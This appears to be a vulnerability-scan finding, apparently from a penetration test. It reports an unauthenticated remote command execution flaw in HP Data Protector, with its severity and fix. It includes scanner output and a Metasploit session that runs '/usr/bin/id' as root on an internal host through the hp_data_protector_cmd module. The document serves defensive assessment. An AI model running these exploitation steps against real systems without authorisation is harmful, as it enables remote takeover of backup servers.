53641 (1) - HP Data Protector Remote Command Execution
Synopsis
The remote service allows remote execution of arbitrary commands without authentication.
Description
The remote HP Data Protector client or server service is affected by a command execution vulnerability. A malicious user can send a specially crafted packet that causes this service to execute an arbitrary shell command with system privileges.
See Also
http://archives.neohapsis.com/archives/bugtraq/2011-02/0076.html
Solution
1. Upgrade to Data Protector A.06.20 or later and
2. Enable encrypted control communication services on cell server and all clients in cell.
Risk Factor
Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
References
BID | |
CVE | |
XREF | |
XREF | EDB-ID:17339 |
XREF | EDB-ID:17648 |
XREF | EDB-ID:18521 |
XREF | EDB-ID:27400 |
Exploitable with
CANVAS (true), Metasploit (true)
Plugin Information:
Publication date: 2011/05/03, Modification date: 2013/08/08
Hosts
192.168.1.92 (tcp/5555)
Nessus was able to exploit the vulnerability to execute the command
'/usr/bin/id' on the remote host, which produced the following output :
------------------------------ snip ------------------------------
sdp2
uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------ snip ------------------------------
Attack Details
msf auxiliary(hp_data_protector_cmd) > show options

Module options (auxiliary/admin/hp/hp_data_protector_cmd):

   Name   Current Setting            Required  Description
   ----   ---------------            --------  -----------
   CMD    Windows\System32\calc.exe  yes       File to execute
   RHOST                             yes       The target address
   RPORT  5555                       yes       The target port

msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id
CMD => /usr/bin/id
msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92
RHOST => 192.168.1.92
msf auxiliary(hp_data_protector_cmd) > run

[*] 192.168.1.92:5555 - Sending command...
[*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users) sdp2^F6 0
[*] Auxiliary module execution completed